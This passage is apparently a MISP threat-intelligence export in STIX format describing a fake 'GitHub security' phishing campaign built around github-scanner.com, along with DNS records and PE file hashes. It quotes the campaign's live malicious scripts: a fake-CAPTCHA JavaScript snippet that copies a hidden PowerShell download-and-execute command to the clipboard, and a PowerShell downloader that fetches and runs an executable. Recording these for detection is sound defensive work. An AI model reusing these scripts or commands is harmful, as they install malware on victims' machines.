"kill_chain_name": "misp-category",
|
||
|
"phase_name": "network"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"ip-port\"",
|
||
|
"misp:meta-category=\"network\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "malware",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "malware--7b88da77-5001-4565-926e-965d55319a24",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T07:27:14.000Z",
|
||
|
"modified": "2024-09-19T07:27:14.000Z",
|
||
|
"is_family": false,
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "misc"
|
||
|
}
|
||
|
],
|
||
|
"implementation_languages": [
|
||
|
"PowerShell"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"script\"",
|
||
|
"misp:meta-category=\"misc\"",
|
||
|
"misp:to_ids=\"False\""
|
||
|
],
|
||
|
"x_misp_script": "$webClient = New-Object System.Net.WebClient\r\n $url1 = \"https://github-scanner.com/l6E.exe\"\r\n $filePath1 = \"$env:TEMP\\SysSetup.exe\"\r\n $webClient.DownloadFile($url1, $filePath1)\r\n Start-Process -FilePath $env:TEMP\\SysSetup.exe",
|
||
|
"x_misp_state": "Malicious"
|
||
|
},
|
||
|
{
|
||
|
"type": "observed-data",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "observed-data--6cf75a0e-8809-4ba1-9e06-0de7f5815935",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T06:27:57.000Z",
|
||
|
"modified": "2024-09-19T06:27:57.000Z",
|
||
|
"first_observed": "2024-09-19T06:27:57Z",
|
||
|
"last_observed": "2024-09-19T06:27:57Z",
|
||
|
"number_observed": 1,
|
||
|
"object_refs": [
|
||
|
"email-message--6cf75a0e-8809-4ba1-9e06-0de7f5815935"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"email\"",
|
||
|
"misp:meta-category=\"network\"",
|
||
|
"misp:to_ids=\"False\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "email-message",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "email-message--6cf75a0e-8809-4ba1-9e06-0de7f5815935",
|
||
|
"is_multipart": false,
|
||
|
"x_misp_email_body": "Hey there!\r\n\r\nWe have detected a security vulnerability in your repository. Please contact us at https://github-scanner.com to get more information on how to fix this issue.\r\n\r\nBest regards,\r\nGithub Security Team"
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T06:43:52.000Z",
|
||
|
"modified": "2024-09-19T06:43:52.000Z",
|
||
|
"description": "Enriched via the url_import module",
|
||
|
"pattern": "[url:value = 'https://github-scanner.com' AND url:x_misp_tld = 'com' AND url:x_misp_host = 'github-scanner.com' AND url:x_misp_domain_without_tld = 'github-scanner' AND url:x_misp_domain = 'github-scanner.com']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2024-09-19T06:43:52Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "network"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"url\"",
|
||
|
"misp:meta-category=\"network\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "malware",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "malware--a4e7b874-225e-4206-9cf8-f858854d4ca5",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T06:25:55.000Z",
|
||
|
"modified": "2024-09-19T06:25:55.000Z",
|
||
|
"is_family": false,
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "misc"
|
||
|
}
|
||
|
],
|
||
|
"implementation_languages": [
|
||
|
"JavaScript"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"script\"",
|
||
|
"misp:meta-category=\"misc\"",
|
||
|
"misp:to_ids=\"False\""
|
||
|
],
|
||
|
"x_misp_script": "<script>\r\n\r\n const verifyButton = document.getElementById('verifyButton');\r\n const modalBg = document.getElementById('modalBg');\r\n\r\n\r\n verifyButton.addEventListener('click', function() {\r\n modalBg.style.display = 'flex'; \r\n const captchaText = \"powershell.exe -w hidden -Command \\\"iex (iwr 'https://github-scanner.com/download.txt').Content\\\" # \\\"\u2705 ''I am not a robot - reCAPTCHA Verification ID: 93752\\\"\";\r\n const tmpTxtArea = document.createElement(\"textarea\");\r\n tmpTxtArea.value = captchaText;\r\n document.body.appendChild(tmpTxtArea);\r\n tmpTxtArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tmpTxtArea);\r\n\r\n\r\n });\r\n\r\n </script>",
|
||
|
"x_misp_state": "Malicious"
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--74c5c23f-d5e2-4407-b36a-94bb95135a77",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T06:42:41.000Z",
|
||
|
"modified": "2024-09-19T06:42:41.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"passive-dns\"",
|
||
|
"misp:meta-category=\"network\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "counter",
|
||
|
"object_relation": "count",
|
||
|
"value": "1",
|
||
|
"category": "Other",
|
||
|
"uuid": "a7146192-8420-4928-80cd-b7dd54b2d63a"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "origin",
|
||
|
"value": "https://www.circl.lu/pdns/",
|
||
|
"category": "Other",
|
||
|
"uuid": "d0ea57d4-b2df-4520-a130-592898e9143a"
|
||
|
},
|
||
|
{
|
||
|
"type": "datetime",
|
||
|
"object_relation": "time_first",
|
||
|
"value": "2024-09-18T15:43:13+00:00",
|
||
|
"category": "Other",
|
||
|
"uuid": "f5765243-a368-4412-93fe-fd5fc6b8bc4c"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "rrtype",
|
||
|
"value": "A",
|
||
|
"category": "Other",
|
||
|
"uuid": "7a458de1-9ea2-46bc-a784-f2853ac3f82a"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "rrname",
|
||
|
"value": "188.114.96.3",
|
||
|
"category": "Other",
|
||
|
"uuid": "3f31fe30-22a8-4ec6-a58a-ba597d266087"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "rdata",
|
||
|
"value": "github-scanner.com",
|
||
|
"category": "Other",
|
||
|
"uuid": "5e1f1f5f-e66e-4870-aad9-b483506fb6bb"
|
||
|
},
|
||
|
{
|
||
|
"type": "datetime",
|
||
|
"object_relation": "time_last",
|
||
|
"value": "2024-09-18T15:43:13+00:00",
|
||
|
"category": "Other",
|
||
|
"uuid": "f24dc9c9-717f-423a-b6da-32542a4523fd"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_comment": "github-scanner.com: Enriched via the circl_passivedns module",
|
||
|
"x_misp_meta_category": "network",
|
||
|
"x_misp_name": "passive-dns"
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--a9e61709-f87b-460b-9b43-03e65c73158e",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T07:27:51.000Z",
|
||
|
"modified": "2024-09-19T07:27:51.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"passive-dns\"",
|
||
|
"misp:meta-category=\"network\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "counter",
|
||
|
"object_relation": "count",
|
||
|
"value": "1",
|
||
|
"category": "Other",
|
||
|
"uuid": "12c7a456-b9d4-462a-a5c8-51b4e97c56f1"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "origin",
|
||
|
"value": "https://www.circl.lu/pdns/",
|
||
|
"category": "Other",
|
||
|
"uuid": "4d6ba8b3-d4aa-419e-bdfe-8e3f81d7a13a"
|
||
|
},
|
||
|
{
|
||
|
"type": "datetime",
|
||
|
"object_relation": "time_first",
|
||
|
"value": "2024-09-18T15:43:13+00:00",
|
||
|
"category": "Other",
|
||
|
"uuid": "0581172c-fed8-4e53-88b8-b353eb7f0fe6"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "rrtype",
|
||
|
"value": "A",
|
||
|
"category": "Other",
|
||
|
"uuid": "98a3b004-8bf4-4ba6-a6ea-36d1db8b35ba"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "rrname",
|
||
|
"value": "188.114.97.3",
|
||
|
"category": "Other",
|
||
|
"uuid": "2651f7af-b03f-4662-a834-50026d0f5fc3"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "rdata",
|
||
|
"value": "github-scanner.com",
|
||
|
"category": "Other",
|
||
|
"uuid": "158e2135-3f8d-414b-98af-146c79c19cf1"
|
||
|
},
|
||
|
{
|
||
|
"type": "datetime",
|
||
|
"object_relation": "time_last",
|
||
|
"value": "2024-09-18T15:43:13+00:00",
|
||
|
"category": "Other",
|
||
|
"uuid": "1834cdf2-5ec0-49a3-9614-f346c40b2a7d"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_comment": "github-scanner.com: Enriched via the circl_passivedns module",
|
||
|
"x_misp_meta_category": "network",
|
||
|
"x_misp_name": "passive-dns"
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--8d5c5d36-0492-46c2-97df-a70cfcdf04bd",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T07:27:30.000Z",
|
||
|
"modified": "2024-09-19T07:27:30.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"passive-dns\"",
|
||
|
"misp:meta-category=\"network\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "counter",
|
||
|
"object_relation": "count",
|
||
|
"value": "3",
|
||
|
"category": "Other",
|
||
|
"uuid": "f1656c54-eb92-4b33-a008-e24b6b51bf7e"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "origin",
|
||
|
"value": "https://www.circl.lu/pdns/",
|
||
|
"category": "Other",
|
||
|
"uuid": "e6681e64-9d1b-4bd9-be23-80e1fb8584d8"
|
||
|
},
|
||
|
{
|
||
|
"type": "datetime",
|
||
|
"object_relation": "time_first",
|
||
|
"value": "2024-09-18T20:46:29+00:00",
|
||
|
"category": "Other",
|
||
|
"uuid": "b5539651-1ce5-469d-86e5-0c03758544c3"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "rrtype",
|
||
|
"value": "SOA",
|
||
|
"category": "Other",
|
||
|
"uuid": "726c8c6d-947a-421b-8771-4996e61b9be6"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "rrname",
|
||
|
"value": "cody.ns.cloudflare.com dns.cloudflare.com 2352168100 10000 2400 604800 1800",
|
||
|
"category": "Other",
|
||
|
"uuid": "74f3d184-1838-48bc-bff1-4bcfb3eecf8f"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "rdata",
|
||
|
"value": "github-scanner.com",
|
||
|
"category": "Other",
|
||
|
"uuid": "17d1b83b-2b50-4ffd-914f-fd436b5817c8"
|
||
|
},
|
||
|
{
|
||
|
"type": "datetime",
|
||
|
"object_relation": "time_last",
|
||
|
"value": "2024-09-19T00:21:56+00:00",
|
||
|
"category": "Other",
|
||
|
"uuid": "0bc5f99a-63dc-419c-9afc-ef0270269239"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_comment": "github-scanner.com: Enriched via the circl_passivedns module",
|
||
|
"x_misp_meta_category": "network",
|
||
|
"x_misp_name": "passive-dns"
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--b53c8423-c8a7-4863-a01a-3e9eebcb199f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T06:27:12.000Z",
|
||
|
"modified": "2024-09-19T06:27:12.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"passive-dns\"",
|
||
|
"misp:meta-category=\"network\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "counter",
|
||
|
"object_relation": "count",
|
||
|
"value": "6",
|
||
|
"category": "Other",
|
||
|
"uuid": "2d1bf529-44f6-4bd4-ac89-97f6bbffb7dd"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "origin",
|
||
|
"value": "https://www.circl.lu/pdns/",
|
||
|
"category": "Other",
|
||
|
"uuid": "dfb4bc4e-177b-4346-b8c4-16489de1f367"
|
||
|
},
|
||
|
{
|
||
|
"type": "datetime",
|
||
|
"object_relation": "time_first",
|
||
|
"value": "2024-09-18T20:29:31+00:00",
|
||
|
"category": "Other",
|
||
|
"uuid": "30c74f8c-0b9c-418f-8292-4ec681c94451"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "rrtype",
|
||
|
"value": "A",
|
||
|
"category": "Other",
|
||
|
"uuid": "a60bbba2-1d7b-4bbb-a4a1-075a75d5fe9e"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "rrname",
|
||
|
"value": "185.208.159.43",
|
||
|
"category": "Other",
|
||
|
"uuid": "f7484977-e5cf-4cce-8a1d-aeb7d1de1813"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "rdata",
|
||
|
"value": "github-scanner.com",
|
||
|
"category": "Other",
|
||
|
"uuid": "4b02653a-19de-44d8-87ac-3a6c51cea125"
|
||
|
},
|
||
|
{
|
||
|
"type": "datetime",
|
||
|
"object_relation": "time_last",
|
||
|
"value": "2024-09-19T05:00:55+00:00",
|
||
|
"category": "Other",
|
||
|
"uuid": "7e65468d-c230-4c73-9bcb-498531b6ca8a"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_comment": "github-scanner.com: Enriched via the circl_passivedns module",
|
||
|
"x_misp_meta_category": "network",
|
||
|
"x_misp_name": "passive-dns"
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--8191b040-b2fe-4f2e-9dbd-9069d833a4e7",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T07:26:47.000Z",
|
||
|
"modified": "2024-09-19T07:26:47.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"user-action\"",
|
||
|
"misp:meta-category=\"misc\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "action",
|
||
|
"value": "Execute",
|
||
|
"category": "Other",
|
||
|
"uuid": "5365bd91-b848-4155-8e0d-10d1f2c20bd6"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "description",
|
||
|
"value": "Copy the paste buffer and execute the following script.",
|
||
|
"category": "Other",
|
||
|
"uuid": "c191cff1-85f2-4469-ac94-e0901a794c3b"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_meta_category": "misc",
|
||
|
"x_misp_name": "user-action"
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--6772a782-f051-4a2a-b3e3-2a6794dcd31d",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T06:40:10.000Z",
|
||
|
"modified": "2024-09-19T06:40:10.000Z",
|
||
|
"pattern": "[file:extensions.'windows-pebinary-ext'.imphash = 'f34d5f2d4577ed6d9ceec516c1f5a744' AND file:extensions.'windows-pebinary-ext'.number_of_sections = '3' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.optional_header.address_of_entry_point = '4543198' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2024-09-18T14:21:22+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '07b89ccdef9eb2727f8eae56769c60b0a84b8de906ea9ac71cdc53f7fc9608fd' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = 'VQP.exe' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = 'VQP.exe' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = 'outfawned' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '1.0.0.0' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = 'Shopman Stairs' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '1.0.0.0' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'listening triskelion' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright 2024' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '000004b0']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2024-09-19T06:40:10Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "file"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"pe\"",
|
||
|
"misp:meta-category=\"file\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--955c7da3-97ac-4ea0-bc8d-50dee6e03306",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T06:17:26.000Z",
|
||
|
"modified": "2024-09-19T06:17:26.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"pe-section\"",
|
||
|
"misp:meta-category=\"file\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "name",
|
||
|
"value": ".text",
|
||
|
"category": "Other",
|
||
|
"uuid": "b4909947-07c4-4896-aaa3-c723e4da85bd"
|
||
|
},
|
||
|
{
|
||
|
"type": "size-in-bytes",
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"value": "340992",
|
||
|
"category": "Other",
|
||
|
"uuid": "edc458e8-d973-4fd8-92d8-6311c4d57f9f"
|
||
|
},
|
||
|
{
|
||
|
"type": "float",
|
||
|
"object_relation": "entropy",
|
||
|
"value": "7.9962764836933",
|
||
|
"category": "Other",
|
||
|
"uuid": "33c823cc-ac6f-4e09-b550-676bf9217b11"
|
||
|
},
|
||
|
{
|
||
|
"type": "md5",
|
||
|
"object_relation": "md5",
|
||
|
"value": "14ca9e349f994e878e57686119f004d4",
|
||
|
"category": "Payload delivery",
|
||
|
"to_ids": true,
|
||
|
"uuid": "0b956e68-c3b9-4c7f-8b41-86574b936f62"
|
||
|
},
|
||
|
{
|
||
|
"type": "sha1",
|
||
|
"object_relation": "sha1",
|
||
|
"value": "9fca5f5394c9dfe0c1e13f05b4ef26c02d4f7862",
|
||
|
"category": "Payload delivery",
|
||
|
"to_ids": true,
|
||
|
"uuid": "732b6f90-810e-4330-8009-4f861ac91d7e"
|
||
|
},
|
||
|
{
|
||
|
"type": "sha256",
|
||
|
"object_relation": "sha256",
|
||
|
"value": "ff87b44ae63fc48174dd73a0efb161df297861d1e4b9c66eb1869eb0b355d7db",
|
||
|
"category": "Payload delivery",
|
||
|
"to_ids": true,
|
||
|
"uuid": "518870f6-9302-43ec-846d-9dd72d6bd21d"
|
||
|
},
|
||
|
{
|
||
|
"type": "sha512",
|
||
|
"object_relation": "sha512",
|
||
|
"value": "f9768fddc997d4f9eea1b982e4bc1b5c42edd9bcf7aa7031fba976f65d663211505b40a0a5d2b943998396fb4ee406b14867754edf74c18e922679bb809ab5a0",
|
||
|
"category": "Payload delivery",
|
||
|
"to_ids": true,
|
||
|
"uuid": "0073e7c4-ab21-43a4-b6e0-a6a35dac0dcb"
|
||
|
},
|
||
|
{
|
||
|
"type": "ssdeep",
|
||
|
"object_relation": "ssdeep",
|
||
|
"value": "6144:/Dd+O7VyIqZiQUa+I0st4nlSVbiWN6VqWeqfn3Zsz9HMiobZYK1QL:Z+O5yIqxwI3tFOqWeqcYbZYzL",
|
||
|
"category": "Payload delivery",
|
||
|
"to_ids": true,
|
||
|
"uuid": "3e6b9523-17a0-406b-813a-1aad3eabfacc"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_meta_category": "file",
|
||
|
"x_misp_name": "pe-section"
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--d8e8ebd4-0bdd-44f7-9802-14ebf7842bb1",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T06:17:26.000Z",
|
||
|
"modified": "2024-09-19T06:17:26.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"pe-section\"",
|
||
|
"misp:meta-category=\"file\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "name",
|
||
|
"value": ".rsrc",
|
||
|
"category": "Other",
|
||
|
"uuid": "77b42955-59c7-4099-92f9-860026e5d139"
|
||
|
},
|
||
|
{
|
||
|
"type": "size-in-bytes",
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"value": "1536",
|
||
|
"category": "Other",
|
||
|
"uuid": "8a1c3d0f-ff2b-4d0e-9dd1-7c5a3f87c552"
|
||
|
},
|
||
|
{
|
||
|
"type": "float",
|
||
|
"object_relation": "entropy",
|
||
|
"value": "4.224078572507",
|
||
|
"category": "Other",
|
||
|
"uuid": "ea5d4cca-6725-43c1-853f-4b38e373b925"
|
||
|
},
|
||
|
{
|
||
|
"type": "md5",
|
||
|
"object_relation": "md5",
|
||
|
"value": "c38218fae44dcc2ce3d1629fec6039ed",
|
||
|
"category": "Payload delivery",
|
||
|
"to_ids": true,
|
||
|
"uuid": "55a8331b-fb85-4d4d-a2ed-f309bfdfc276"
|
||
|
},
|
||
|
{
|
||
|
"type": "sha1",
|
||
|
"object_relation": "sha1",
|
||
|
"value": "59ce2a22d5441931757c56512e053728c1113694",
|
||
|
"category": "Payload delivery",
|
||
|
"to_ids": true,
|
||
|
"uuid": "395f491e-7183-4c16-8bbe-699f42b8a533"
|
||
|
},
|
||
|
{
|
||
|
"type": "sha256",
|
||
|
"object_relation": "sha256",
|
||
|
"value": "30333eda5ecb5656ee2cbd56528cf9f16c55befa0e4a0d3d08d15b69a3097b97",
|
||
|
"category": "Payload delivery",
|
||
|
"to_ids": true,
|
||
|
"uuid": "fd38d729-9878-43ac-bbc1-d21c37cf224d"
|
||
|
},
|
||
|
{
|
||
|
"type": "sha512",
|
||
|
"object_relation": "sha512",
|
||
|
"value": "5503f5311d379b243ec5177996e9d8d0b0cd14e12383cf44f93f4be83a1b0109828683e80eee2dc7131948e1f6d1708165ffe91771d4354649c03c0d004bad17",
|
||
|
"category": "Payload delivery",
|
||
|
"to_ids": true,
|
||
|
"uuid": "b7e2a1f8-ab37-4b5c-a8c3-b50889b60b08"
|
||
|
},
|
||
|
{
|
||
|
"type": "ssdeep",
|
||
|
"object_relation": "ssdeep",
|
||
|
"value": "24:7DRIYKyV6CyZhNPs2E31MPN8qgdt4+lEbNFjMyi0r:H1JoplP76KFWSfbNtm+",
|
||
|
"category": "Payload delivery",
|
||
|
"uuid": "be033b1f-c601-46b5-93ec-261dac6d59c0"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_meta_category": "file",
|
||
|
"x_misp_name": "pe-section"
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--dd34d3e1-91f3-4dd5-95b8-b870b7a19f84",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2024-09-19T06:17:26.000Z",
|
||
|
"modified": "2024-09-19T06:17:26.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"pe-section\"",
|
||
|
"misp:meta-category=\"file\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "name",
|
||
|
"value": ".reloc",
|
||
|
"category": "Other",
|
||
|
"uuid": "3e4fd42f-994d-475d-aca9-0d815e2c9c50"
|
||
|
},
|
||
|
{
|
||
|
"type": "size-in-bytes",
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"value": "512",
|
||
|
"category": "Other",
|
||
|
"uuid": "b81e0aaa-3423-4785-91fc-75fa8374928c"
|
||
|
},
|
||
|
{
|
||
|
"type": "float",
|
||
|
"object_relation": "entropy",
|
||
|
"value": "1.9473387961876",
|
||
|
"category": "Other",
|
||
|
"uuid": "6d710c11-e24c-4242-8fc8-59c9dc1ead18"
|
||
|
},
|
||
|
{
|
||
|
"type": "md5",
|
||
|
"object_relation": "md5",
|
||
|
"value": "b1c19dc88419b41741030f2fceb517c1",
|
||
|
"category": "Payload delivery",
|
||
|
"to_ids": true,
|
||
|
"uuid": "e424a76c-3282-4f7c-b863-1f280ad74df7"
|
||
|
},
|
||
|
{
|
||
|
"type": "sha1",
|
||
|
"object_relation": "sha1",
|
||
|
"value": "ce204d1894753f6a806fda9121c0e3ea83c23dd5",
|
||
|
"category": "Payload delivery",
|
||
|
"to_ids": true,
|
||
|
"uuid": "64b0d5d4-960e-4339-a1b7-7402e7e922a4"
|
||
|
},
|
||
|
{
|
||
|
"type": "sha256",
|
||
|
"object_relation": "sha256",
|
||
|
"value": "9a6833fd3cc183b906caf84dad1e9ce58b805f604b34fa49c73395c2a27c2a2a",
|
||
|
"category": "Payload delivery",
|
||
|
"to_ids": true,
|
||
|
"uuid": "e0756a69-cdba-4dc9-8069-f0b041214104"
|
||
|
},
|
||
|
{
|
||
|
"type": "sha512",
|
||
|
"object_relation": "sha512",
|
||
|
"value": "84ddff913d039c49bc4de7b69f43552949d05090a44b31cbb65a6474edea9eebaedb10962f1fa38e36b22f1f890787e6192eb7752d6708d11de87a14c0d93bbf",
|
||
|
"category": "Payload delivery",
|
||
|
"to_ids": true,
|
||
|
"uuid": "646cfa34-a007-4571-998c-8886fd6190b1"
|
||
|
},
|
||
|
{
|
||
|
"type": "ssdeep",
|
||
|
"object_relation": "ssdeep",
|
||
|
"value": "3:oRlF1l:oD1",
|
||
|
"category": "Payload delivery",
|
||
|
"to_ids": true,
|
||
|
"uuid": "391c66d8-a317-4d3c-ad8c-d22e96639603"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_meta_category": "file",
|
||
|
"x_misp_name": "pe-section"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--8fb1b0ab-8275-4d7d-bf33-fff50945409b",
|
||
|
"created": "2024-09-19T07:27:14.000Z",
|
||
|
"modified": "2024-09-19T07:27:14.000Z",
|
||
|
"relationship_type": "downloads",
|
||
|
"source_ref": "malware--7b88da77-5001-4565-926e-965d55319a24",
|
||
|
"target_ref": "indicator--5c92fd4e-765a-418a-bc4c-9b1bc9db3fb6"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--a7ad8124-928f-4630-9572-0a842e4f054f",
|
||
|
"created": "2024-09-19T06:27:57.000Z",
|
||
|
"modified": "2024-09-19T06:27:57.000Z",
|
||
|
"relationship_type": "contains",
|
||
|
"source_ref": "observed-data--6cf75a0e-8809-4ba1-9e06-0de7f5815935",
|
||
|
"target_ref": "indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--11f78223-6aa5-498f-ade3-7614709517ab",
|
||
|
"created": "2024-09-19T06:28:27.000Z",
|
||
|
"modified": "2024-09-19T06:28:27.000Z",
|
||
|
"relationship_type": "contains",
|
||
|
"source_ref": "indicator--3bf7a6e8-a3b2-4975-bf4c-cc2c90329a94",
|
||
|
"target_ref": "malware--a4e7b874-225e-4206-9cf8-f858854d4ca5"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--28aaf756-8380-4651-8f67-8179d33ae7eb",
|
||
|
"created": "2024-09-19T06:43:52.000Z",
|
||
|
"modified": "2024-09-19T06:43:52.000Z",
|
||
|
